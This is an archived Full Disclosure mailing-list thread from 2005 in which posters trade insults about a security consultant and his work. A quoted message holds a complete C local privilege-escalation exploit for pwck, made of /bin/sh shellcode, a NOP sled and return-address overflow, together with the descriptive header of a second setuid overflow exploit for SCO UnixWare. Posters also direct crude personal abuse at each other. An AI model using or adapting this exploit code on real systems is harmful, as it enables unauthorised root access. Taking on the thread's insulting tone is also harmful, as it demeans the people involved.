Full Disclosure mailing list archives
Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too)
From: Day Jay <d4yj4y () yahoo com>
Date: Mon, 9 May 2005 10:38:08 -0700 (PDT)
I advise everyone to check out o'great Steve's site and I have never seen such a celebration of mediocrity and unutilized "knowledge" anywhere else in my life. If I was even convinced of 1% of what skills he claims to have, then there would be much more under that fatman's belt. oh, what I won't tell you is what makes me so great. Wish I could, but I would never give you that time of day. Sorry. Just because you met fat Steve and he was nice, doesn't make him special at all. You should get out more and meet more people-that's the only advice I could give you. Let's keep the ass-kissing to a min. pls kthxbye --- tuytumadre () att net wrote:
Day jay, you may find it fun to criticize those recognized by Microsoft, but let me remind you that Steve has done more to help computer security then you will ever dream of accomplishing. He has forgotten more about computers then you will ever learn. I have met Steve, and he is a very nice man. Steve is a very successful person, contrary to your opinion of the alternative. I am surprised that people still hold you in any form of regard, after you acting like a complete asshole during your dumb shellcode-masked backdoor incident. However, I do not know enough about you to categorize you as a jerk. What do you do for a living? What makes you so special that you can criticize a successful, intellegent man for your personal satisfaction, or are you just a hypocrite? Tell me, oh "1337" one. Paul -------------- Original message from Day Jay <d4yj4y () yahoo com>: --------------We all saw how short the code was I had for thatpwckbuffer overflow exploit. He also hardcodes thestackpointer, hahah. ----------MINE----------------- #include char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68"; unsigned long sp(void) { __asm__("movl %esp, %eax");} int main(int argc, char *argv[]) { int i, offset; long esp, ret, *addr_ptr; char *buffer, *ptr; offset = 1700; //the offset I first found worked esp = sp(); ret = esp - offset; buffer = malloc(2200); ptr = buffer; addr_ptr = (long *) ptr; for(i=0; i < 2200; i+=4) { *(addr_ptr++) = ret; } for(i=0; i < 1000; i++) { buffer[i] = '\x90'; } ptr = buffer + 200; for(i=0; i < strlen(shellcode); i++) { *(ptr++) = shellcode[i]; } buffer[2200-1] = 0; printf("d4yj4y fscked j00r mom!\n"); sleep(2); execl("/usr/sbin/pwck", "pwck", buffer, 0); free(buffer); return 0; } ------------------HIS-------------- I have a feeling Steve was just mad mine was soshortcompared to his, lol THIS IS HIS LOCAL ROOT EXPLOIT: /* * dvexploit.c * * written by : Stephen J. Friedl * Software Consultant * 2000-06-24 * steve unixwiz net * * This program exploits the "Double Vision" systemonSCO * Unixware 7.1.0 via a buffer overflow on the "dvtermtype" * program. Double Vision is like a "pcAnywhere forUNIX", * but quite a few programs in this distributionaresetuid * root. The problem is that these programs werenotwritten * with security in mind, and it's not clear thattheyeven * need to be setuid root. * * This particular program exploits "dvtermtype" bypassing a * very long second parameter that overflows some internal * buffer. This buffer is filled with a predicted address * of the shellcode, and the shellcode itself is stored in * a very long environment variable. This approach makes * the shellcode much easier to find. * * This shellcode was based directly on the greatworkof * Brock Tellier (btellier usa net), who seems to spend a lot * of time within with various SCO UNIX release. Thanks! * * This shellcode runs /tmp/ui, which should bethissimple * program: * * $ cd /tmp * $ cat ui.c * int main() { setreuid(0,0); system("/bin/sh"); return 0; } * $ cc ui.c -o ui * * Brock's original work compiled thisautomatically,but I * prefer to do it by hand. A better approach is todothe * setreuid() in the shellcode and call /bin/sh directly. * Maybe another day. * * BUILD/TEST ENVIRONMENT * ---------------------- * * $ cc -v * UX:cc: INFO: Optimizing C Compilation System(CCS)3.2 03/03/99 (CA-unk_voyager5) * * $ uname -a * UnixWare foo 5 7.1.0 i386 x86at SCO UNIX_SVR5 * * from /usr/lib/dv/README * * DoubleVision for Character Terminals Release 3.0* Last Update: December 7, 1999 * * TUNING * ------ * * The default parameters to this program work ontheversions mentioned * above, but for variants some tuning might be required. There are three * parameters that guide this program's operation: * * -a retaddr set the "return" address to the givenhex value, * which is the address where we expect to find the* exploit code in the environment. The environment* is at a relatively fixed location just below * 0x80000000, so getting "close" is usually sufficient. * Note that this address cannot have any zerobytes* in it! We believe that the target code hasenough* padding NOP values to make it an easy target. * * -r retlen length of the overflowed "returnaddress"buffer, * which is filled in with the address provided above. * Default = 2k, max = 5k. * * -l n slightly shift the alignment of the return address * buffer by 1, 2 or 3 in case the buffer that's being * overflowed. */
=== message truncated ===> _______________________________________________
Full-Disclosure - We believe in it. Charter:
http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia -
http://secunia.com/ __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too), (continued)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Valdis . Kletnieks (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Valdis . Kletnieks (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Valdis . Kletnieks (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Valdis . Kletnieks (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Valdis . Kletnieks (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Day Jay (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) J u a n (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) Micheal Espinola Jr (May 09)
- Re: PWCK Overflow POC Code Redhat/Suse older versions or something (maybe later too) James Tucker (May 09)